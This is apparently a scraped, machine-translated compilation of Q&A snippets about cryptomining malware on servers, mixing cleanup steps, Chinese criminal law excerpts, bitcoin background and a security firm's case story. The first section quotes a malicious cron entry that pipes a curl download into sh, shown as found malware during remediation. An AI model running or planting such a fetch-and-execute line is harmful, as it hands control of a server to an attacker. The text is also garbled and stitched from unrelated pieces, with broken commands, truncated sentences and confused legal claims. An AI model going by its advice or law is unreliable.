stealing server mining crime

Ⅰ What should I do if the Alibaba Cloud server is mined (pure computer novice

1. Close the access to the mining server

iptables -A INPUT -s xmr -j DROP and iptables -A OUTPUT -d -j DROP.

2. chmod -x minerd , cancel the execution permission, not found Before rooting, do not delete minerd, because if you delete it, it will automatically generate one.

3. pkill minerd, kill the process

4. service stop crond or crontab -r delete all execution plans

5. Execute top, check for a while, and find no more minerd process.

6. Check /var/spool A timer file for root user is found in the /cron/ directory.

Download the script statement:

*/5 * * * * curl -fsSL http:// | sh
The content of the virus file is as follows, if you are interested, you can study it:

View Code

Solve minerd and It’s not the ultimate goal, it’s mainly to find the root cause of the problem. My server problem lies in the redis service. Hackers used a vulnerability in redis to gain access to the server. Just injected the virus, the following is the solution and removal work:

1. Repair the backdoor of redis,

Configure the bind option, limit the IP that can connect to the Redis server, and modify The default port of redis is 6379.
Configure AUTH, set the password, and the password will be saved in the redis configuration file in clear text.
Configure the rename-command CONFIG “RENAME_CONFIG”, so that even if there is unauthorized access, it can be Make it more difficult for attackers to use config commands
The good news is that the author of Redis said that they will develop “real user”, which distinguishes between ordinary users and admin permissions. Ordinary users will be prohibited from running certain commands, such as con f
2. Open ~/.ssh/authorized_keys, delete accounts you don’t know

3. Check your user list to see if any users you don’t know have been added. If there is, delete it.

ⅡHow long is the sentence for stealing mining in Internet cafes

Small mining in Internet cafes is sentenced to three years in prison.
Virtual currency does not have the same legal status as legal tender.
The details are as follows:
1. The quantity is difficult to meet the needs of market transactions. The Bitcoin program sets a maximum quantity limit, which is the reason why it can maintain and increase its value. It is precisely because of this that it is destined to be difficult to play the function and role of currency;
2. When the Bitcoin wallet is first installed, it will consume a lot of time to download historical transaction data blocks. During Bitcoin transactions, it takes some time to confirm the accuracy of the data, and the transaction is completed after the interaction with the network is confirmed by the entire network;
3. The price fluctuates greatly due to the intervention of a large number of speculators, resulting in the price of Bitcoin exchanged for cash Ups and downs like a roller coaster.
Article 285 of “Criminal Law of the People’s Republic of China” The crime of illegally trespassing computer information systems in violation of state regulations and trespassing computer information systems in the fields of state affairs, national defense construction, and cutting-edge science and technology shall be sentenced to fixed-term imprisonment of not more than three years or detention.
The crime of illegally obtaining computer information system data and illegally controlling computer information system violates state regulations, intruding into computer information systems other than those specified in the preceding paragraph or using other technical means to obtain data stored, processed or transmitted in the computer information system, or Whoever illegally controls the computer information system, if the circumstances are serious, shall be sentenced to fixed-term imprisonment of not more than three years or criminal detention, and shall also or only be fined; if the circumstances are especially serious, he shall be sentenced to fixed-term imprisonment of not less than three years but not more than seven years, and shall also be fined.
Providing programs and tools for invading or illegally controlling computer information systems Provide programs or tools specially used for invading or illegally controlling computer information systems, or provide other people with illegal and criminal acts of invading and illegally controlling computer information systems knowingly Procedures, tools, and serious circumstances shall be punished in accordance with the provisions of the preceding paragraph.
If a unit commits the crimes mentioned in the preceding three paragraphs, the unit shall be fined, and the person in charge and other directly responsible personnel who are directly responsible for it shall be punished in accordance with the provisions of the respective paragraphs.
Article 286 The crime of destroying a computer information system violates state regulations, deletes, modifies, adds, or interferes with the functions of a computer information system, causing the computer information system to fail to operate normally, and the consequences are serious, and shall be sentenced to a term of not more than five years imprisonment or criminal detention; if the consequences are particularly serious, the sentence shall be fixed-term imprisonment of not less than five years.
In violation of state regulations, the operation of deleting, modifying or adding data and application programs stored, processed or transmitted in the computer information system, with serious consequences, shall be punished in accordance with the provisions of the preceding paragraph.
Deliberately making or spreading computer viruses and other destructive programs that affect the normal operation of the computer system, with serious consequences, shall be punished in accordance with the provisions of the first paragraph.
If the unit commits the crimes mentioned in the preceding three paragraphs, the unit shall be fined.� The person in charge and other persons who are directly responsible for it shall be punished in accordance with the provisions of paragraph 1.

Ⅲ 14.5 million stolen! Jiangxi “Bitcoin” theft case is solved, what punishment will the suspect face The current era is an era of the Internet, and it is also an era of rapid development. There are many people who think about making money through illegal means, which is actually not worth advocating. We also hope that everyone can learn from this lesson. , the suspect will also face very severe punishment.

We also hope that this lesson will give everyone a wake-up call. If everyone is like them, then they will definitely face prison. At the same time, we It should be noted that no matter how powerful the hacking technology is, there will still be a lot of hot spots. After all, it is a mortal body and cannot be separated from legal sanctions. I also hope that they can learn this lesson and be a good person in the future. I must not do anything illegal, I hope everyone can notice this.

What should I do if the Ⅳ server is mined?

What did my buddy get mined for? Go report it. When the traffic ore was very popular before, my server was also hacked unscrupulously and became a broiler. Then I went to find his information, took screenshots and reported the traffic ore, and it helped me deal with it. If you see what you have been charged with, go to them to deal with it.

ⅣIs it illegal to be a bitcoin mining machine?

As of July 24, 2020, the state has not issued any laws stating that bitcoin mining machines are illegal.

Bitcoin mining machine is one of the ways to get bitcoin. Bitcoin (Bitcoin) is a network virtual currency generated by open source P2P software.

It is not issued by a specific currency institution, and is generated by a large number of calculations of a specific algorithm. The Bitcoin economy uses a distributed database composed of many nodes in the entire P2P network to confirm and record all transaction behaviors. The decentralized nature of P2P and the algorithm itself can ensure that the currency value cannot be artificially manipulated by mass-producing Bitcoin.

(5) Extended reading of the crime of misappropriating server mining

The issuance and transaction of Bitcoin are achieved through mining. A definite but ever-decreasing rate is minted. Each new block is accompanied by a certain amount of brand new bitcoins that are created from scratch, which is rewarded as a coinbase transaction to the miner who found the block.

The reward of each block is not fixed. Every 210,000 blocks are mined, it takes about 4 years, and the currency issuance rate is reduced by 50%. During Bitcoin’s first four years of operation, 50 new bitcoins were created per block. 12.5 new bitcoins are created per block. In addition to block rewards, miners also receive fees for all transactions within the block.

Reference Source: Network – Bitcoin Mining Machine

VI Is the act of ore applicable to the crime of theft or illegal mining

I am Lawyers
The crime of theft refers to the purpose of illegal possession in Article 264 of the Criminal Law, and the amount of public and private property stolen is huge, and the crime of illegal mining is stipulated in Article 343 of the Criminal Law, the crime of illegal mining, It refers to violating the provisions of the Mineral Resources Protection Law, mining without obtaining a mining license, entering mining areas planned by the state, mining areas that are of great value to the national economy, and mining areas of others, and mining without authorization. The act of refusing to stop mining after being ordered to stop mining, causing damage to mineral resources.

VII The help server is hacked by mining programs, how to troubleshoot

The new customer recently consulted our SINE security company, saying that the website whose server is often stuck cannot be opened, and the remote connection

The server is very slow, sometimes the PING value is between 300-500, and the packets are often dropped. Listening to what the customer says, generally

It will be judged that it has received CC +DDOS mixed traffic attack, and then ask more specifically, it is said that the computer room is not attacked by traffic, which is a bit strange. It is not a traffic attack, and it also causes the server card and the website to fail to open. This is what attack? In order to solve the problem of the client’s server card, we immediately arranged for a security engineer to conduct security testing and security deployment on his Linux server.

The mining Trojan is also designed to start mining automatically if the mining process is stopped by the customer. Intermittent mining,

Carefully checked and found that it is by setting an hourly execution task plan, downloading the shell mining Trojan remotely, and then executing it to check if the current process exists

, if it does not exist, start the mining Trojan and start mining.

The customer’s linux server has undergone a detailed security inspection and found that fortunately.�� The data of the encrypted server and the virus infecting worm

If the data is encrypted, the loss will be great. The customer is the platform, and the customer data inside is very important. Find out the mining Trojan. Finally,

Clients need to know how exactly the server was attacked? Uploaded by a mining Trojan? Prevent such attacks from recurring in the future


Through the security inspection and analysis of our security engineers, it is found that the server uses the apache tomcat environment, and the platform’s development architecture

The JSP+oracle database is used by apache tomcat It is the 2016 version, which causes the apache to have a serious remote command execution vulnerability.

Intruders can directly invade the server through this vulnerability and get the administrator rights of the server.

SINE security engineers immediately repaired the apache vulnerability and removed the Trojan horse. So far, the problem has been solved, the client server

Everything is running stably, and the website is opened normally.

Ⅷ Is it illegal to steal mines and smash them in your own home?

Stealing mines is illegal. If the number of mines is large, someone will take care of you. I sincerely hope to help you and look forward to adopting them.


Related Ad

Comments (No)

Leave a Reply